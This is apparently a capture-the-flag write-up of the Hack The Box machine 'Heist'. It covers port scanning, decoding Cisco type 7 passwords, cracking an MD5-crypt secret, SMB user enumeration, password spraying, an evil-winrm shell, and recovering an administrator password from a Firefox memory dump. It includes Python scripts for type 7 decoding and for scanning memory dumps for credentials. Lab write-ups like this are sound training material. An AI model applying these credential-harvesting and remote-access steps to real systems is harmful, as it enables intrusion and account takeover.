Let’s start with a port scan:
$ nmap -A -T4 10.10.10.149
Starting Nmap 7.80 ( https://nmap.org ) at 2019-10-30 14:36 EDT
Stats: 0:00:31 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 0.00% done
Nmap scan report for 10.10.10.149
Host is up (0.20s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE       VERSION
80/tcp  open  http          Microsoft IIS httpd 10.0
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
| http-title: Support Login Page
|_Requested resource was login.php
135/tcp open  msrpc         Microsoft Windows RPC
445/tcp open  microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: -1s
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2019-10-30T18:37:11
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 82.67 seconds
As always, when there’s a web server, that’s the first thing that I look into, and there’s a login page:
Given that we can login as guest, let’s do it:
It looks like someone asked for help with the configuration of a Cisco router, and their username appears to be Hazard. Let's check the attachment:
version 12.2
no service pad
service password-encryption
!
isdn switch-type basic-5ess
!
hostname ios-1
!
security passwords min-length 12
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
!
!
ip ssh authentication-retries 5
ip ssh version 2
!
!
router bgp 100
 synchronization
 bgp log-neighbor-changes
 bgp dampening
 network 192.168.0.0 mask 300.255.255.0
 timers bgp 3 9
 redistribute connected
!
ip classless
ip route 0.0.0.0 0.0.0.0 192.168.0.1
!
!
access-list 101 permit ip any any
dialer-list 1 protocol ip list 101
!
no ip http server
no ip http secure-server
!
line vty 0 4
 session-timeout 600
 authorization exec SSH
 transport input ssh
Straight off we have three password hashes. The enable secret 5 one is an MD5-crypt hash (the $1$ prefix) and can be cracked with John the Ripper, so after writing it to a file, let's run john secret5 --wordlist=rockyou.txt. After a couple of seconds, we find out that the
The other two are not really hashes: Cisco type 7 is a reversible obfuscation (a fixed XOR key, with the first two digits giving the starting offset), so they can be decoded instantly with an online tool, like this one, and here they are:
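As an added example (not code from the original post), the following Python does the same job offline: it reverses the type 7 strings with Cisco's fixed XOR key and pulls the username lines and the enable secret out of the config excerpt above, handing the MD5-crypt secret back untouched so it can be written to a file for john. The key constant is Cisco's published one; the regex only understands the plain username ... password 7 ... form shown in this config, and the embedded CONFIG is just the relevant lines copied from the attachment.

```python
import re
from typing import List, Tuple

# Cisco's fixed XOR key for type 7 ("service password-encryption") strings.
_TYPE7_KEY = b"dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"


def decode_type7(encoded: str) -> str:
    """Reverse a Cisco type 7 string.

    Layout: two decimal digits giving the starting offset into _TYPE7_KEY,
    then one hex byte per password character, each XORed with the next key
    byte. No secret is involved, so this is decoding, not cracking.
    """
    if len(encoded) < 4 or len(encoded) % 2 or not encoded[:2].isdigit():
        raise ValueError("malformed type 7 string: %r" % encoded)
    seed = int(encoded[:2])
    payload = bytes.fromhex(encoded[2:])
    return "".join(
        chr(b ^ _TYPE7_KEY[(seed + i) % len(_TYPE7_KEY)])
        for i, b in enumerate(payload)
    )


# Only the "username <name> [privilege N] password 7 <hex>" form is handled.
_USERNAME_RE = re.compile(
    r"^username\s+(\S+)(?:\s+privilege\s+\d+)?\s+password\s+7\s+([0-9A-Fa-f]+)\s*$",
    re.M,
)
# MD5-crypt enable secrets start with $1$ and must be cracked, not decoded.
_SECRET5_RE = re.compile(r"^enable secret 5\s+(\$1\$\S+)\s*$", re.M)


def extract_credentials(config: str) -> Tuple[List[Tuple[str, str]], List[str]]:
    """Return (decoded type 7 logins, enable secret 5 hashes) from an IOS config."""
    logins = [(user, decode_type7(enc)) for user, enc in _USERNAME_RE.findall(config)]
    secrets = _SECRET5_RE.findall(config)
    return logins, secrets


# The credential lines from the router config attached to the ticket.
CONFIG = """\
enable secret 5 $1$pdQG$o8nrSzsGXeaduXrjlvKc91
!
username rout3r password 7 0242114B0E143F015F5D1E161713
username admin privilege 15 password 7 02375012182C1A1D751618034F36415408
"""

if __name__ == "__main__":
    logins, secrets = extract_credentials(CONFIG)
    for user, password in logins:
        print(f"{user}: {password}")
    for h in secrets:
        print(f"write to a file and crack with john: {h}")
```

Running it prints the two decoded logins and echoes the $1$ hash for john; note that privilege 15 on the admin line means that account would have full enable access on the router without needing the cracked secret at all.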
As we have a username and some passwords, we can try to authenticate to the
$ smbclient -L \\\\10.10.10.149 -U 'hazard%stealth1agent'

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.149 failed (Error NT_STATUS_IO_TIMEOUT)
Failed to connect with SMB1 -- no workgroup available
As luck would have it, trying the passwords in the order they appear in the config file, the very first one works!
We can use impacket to enumerate users in the
$ ./lookupsid.py 10.10.10.149/hazard:stealth1agent@10.10.10.149
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Brute forcing SIDs at 10.10.10.149
[*] StringBinding ncacn_np:10.10.10.149[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4254423774-1266059056-3197185112
500: SUPPORTDESK\Administrator (SidTypeUser)
501: SUPPORTDESK\Guest (SidTypeUser)
503: SUPPORTDESK\DefaultAccount (SidTypeUser)
504: SUPPORTDESK\WDAGUtilityAccount (SidTypeUser)
513: SUPPORTDESK\None (SidTypeGroup)
1008: SUPPORTDESK\Hazard (SidTypeUser)
1009: SUPPORTDESK\support (SidTypeUser)
1012: SUPPORTDESK\Chase (SidTypeUser)
1013: SUPPORTDESK\Jason (SidTypeUser)
Getting a shell
We can now try every combination of the usernames and passwords we've found. There's a handy Metasploit module that can help us. After writing all the users in a file called users and the passwords in pws, let's load the module and set the options:
And let’s run it with
Cool! We've found the passwords of Hazard and Chase! Now we can use evil-winrm (install it with gem install --user-install evil-winrm) to check whether either of the two users is allowed to get a remote shell:
$ evil-winrm -u Hazard -p stealth1agent -i 10.10.10.149

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError

Error: Exiting with code 1
No luck with Hazard: the credentials are valid (they worked over SMB), but WinRM only lets in members of the Administrators or Remote Management Users groups, hence the authorization error. Let's try with Chase:
$ evil-winrm -u Chase -p 'Q4)sJu\Y8qz*A3?d' -i 10.10.10.149

Evil-WinRM shell v2.0

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Chase\Documents>
And we got a shell! Let’s check the flag:
*Evil-WinRM* PS C:\Users\Chase\Desktop> Get-Acl user.txt

    Directory: C:\Users\Chase\Desktop

Path     Owner             Access
----     -----             ------
user.txt SUPPORTDESK\Chase NT AUTHORITY\SYSTEM Allow  FullControl...
Listing the files in the Desktop, there’s a curious one:
PS > type todo.txt
Stuff to-do:
1. Keep checking the issues list.
2. Fix the router config.

Done:
1. Restricted access for guest user.
Following the usual enumeration techniques, listing the running processes with Get-Process reveals several instances of Firefox, which stand out among the others. The first thing I did was search the AppData folder for Firefox data like bookmarks, visited URLs and things like that, but I had no luck with it.
The next thing that came to my mind was to dump the process memory with
After downloading it to our machine and moving it to the folder we run evil-winrm from, we can upload it using its upload command.
Now we can dump the Firefox process memory using the PID from the
Because I'm a PowerShell noob, I downloaded the dump to my machine to analyze it, with download firefox.exe_191129_053757.dmp, and after (quite) a bit of time I started searching for strings.
An interesting string to find in the memory dump would be password, so let's search for it:
$ strings firefox.exe_191129_053757.dmp | grep -i password
"C:\Program Files\Mozilla Firefox\firefox.exe" email@example.com&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1firstname.lastname@example.org&login_password=4dD!5}x/re8]FBuZ&login=
email@example.com&login_password=4dD!5}x/re8]FBuZ&login=
MOZ_CRASHREPORTER_RESTART_ARG_1firstname.lastname@example.org&login_password=4dD!5}x/re8]FBuZ&login=
http://email@example.com&login_password=4dD!5}x/re8]FBuZ&login=
Bingo! The login form submission was still sitting in Firefox's memory, URL-encoded with the administrator password in clear, and we can get a shell with these credentials:
*Evil-WinRM* PS C:\Users\Administrator\Desktop> Get-Acl root.txt

    Directory: C:\Users\Administrator\Desktop

Path     Owner                  Access
----     -----                  ------
root.txt BUILTIN\Administrators NT AUTHORITY\SYSTEM Allow  FullControl...
And we have access to the root flag!
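The strings | grep step above only catches 8-bit strings; Windows processes keep a lot of text as UTF-16LE, which strings skips unless you pass -e l. As an added example (not from the original post), this Python scans a dump for URL-encoded credential fields in both encodings and can read a multi-gigabyte file in chunks with an overlap so a match straddling a chunk boundary is not lost. The field names in CRED_KEYS are my own starting list, and SAMPLE_DUMP is a constructed blob that mimics what the Firefox dump held (the password is the one recovered above; the username is made up).

```python
import re
from typing import Iterable, List, Tuple

# Form-field names worth pulling out of a dump. A constructed starting list;
# extend it for the application you are looking at.
CRED_KEYS = ("login_password", "password", "passwd", "pwd")

# A URL-encoded form value runs until '&' (0x26) or a non-printable byte.
_ASCII_VALUE = rb"[\x21-\x25\x27-\x7e]{1,128}"
# The same characters as UTF-16LE: each printable byte followed by a NUL.
_WIDE_VALUE = rb"(?:[\x21-\x25\x27-\x7e]\x00){1,128}"

_ASCII_RE = re.compile(
    rb"(" + b"|".join(re.escape(k.encode()) for k in CRED_KEYS) + rb")=(" + _ASCII_VALUE + rb")",
    re.IGNORECASE,
)
_WIDE_RE = re.compile(
    rb"(" + b"|".join(re.escape(k.encode("utf-16-le")) for k in CRED_KEYS) + rb")=\x00(" + _WIDE_VALUE + rb")",
    re.IGNORECASE,
)

Hit = Tuple[str, str, str]  # (encoding, field name, value)


def find_credentials(blob: bytes) -> List[Hit]:
    """Return every credential-looking form field in blob, ASCII hits first,
    then UTF-16LE hits, with exact duplicates removed."""
    hits: List[Hit] = []
    for m in _ASCII_RE.finditer(blob):
        hits.append(("ascii", m.group(1).decode("ascii").lower(), m.group(2).decode("ascii")))
    for m in _WIDE_RE.finditer(blob):
        hits.append(("utf-16le", m.group(1).decode("utf-16-le").lower(), m.group(2).decode("utf-16-le")))
    seen, unique = set(), []
    for h in hits:
        if h not in seen:
            seen.add(h)
            unique.append(h)
    return unique


def scan_chunks(chunks: Iterable[bytes], overlap: int = 4096) -> List[Hit]:
    """Scan a dump delivered in pieces, carrying `overlap` trailing bytes of
    each piece into the next so a match split across a boundary is still found.
    The overlap is rescanned, so results are de-duplicated."""
    hits: List[Hit] = []
    seen, tail = set(), b""
    for chunk in chunks:
        window = tail + chunk
        for h in find_credentials(window):
            if h not in seen:
                seen.add(h)
                hits.append(h)
        tail = window[-overlap:]
    return hits


def scan_file(path: str, chunk_size: int = 64 << 20) -> List[Hit]:
    """Stream a (possibly huge) dump file through scan_chunks."""
    with open(path, "rb") as fp:
        return scan_chunks(iter(lambda: fp.read(chunk_size), b""))


# Constructed stand-in for a browser memory dump: one ASCII copy of the form
# submission, some junk, then the same fields stored as UTF-16LE.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"MOZ_CRASHREPORTER_RESTART_ARG_1login_username=someone@example.com"
    + b"&login_password=4dD!5}x/re8]FBuZ&login=\x00"
    + b"\xde\xad\xbe\xef" * 8
    + "login_password=4dD!5}x/re8]FBuZ&login=".encode("utf-16-le")
    + b"\x00" * 16
)

if __name__ == "__main__":
    import sys
    hits = scan_file(sys.argv[1]) if len(sys.argv) > 1 else find_credentials(SAMPLE_DUMP)
    for encoding, field, value in hits:
        print(f"[{encoding}] {field} = {value}")
```

Run it with the .dmp path as the only argument to scan a real dump; with no argument it scans the constructed sample and reports the same password twice, once per encoding, which is exactly the case a plain strings run would half-miss.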
I have to admit this one took me quite a bit of time, even though it was only 20 points, because I went down the AppData folder rabbit hole, where there were some cache files and a password database that looked interesting. This is the first time I've analyzed a process's memory, which is an interesting
Thanks for reading!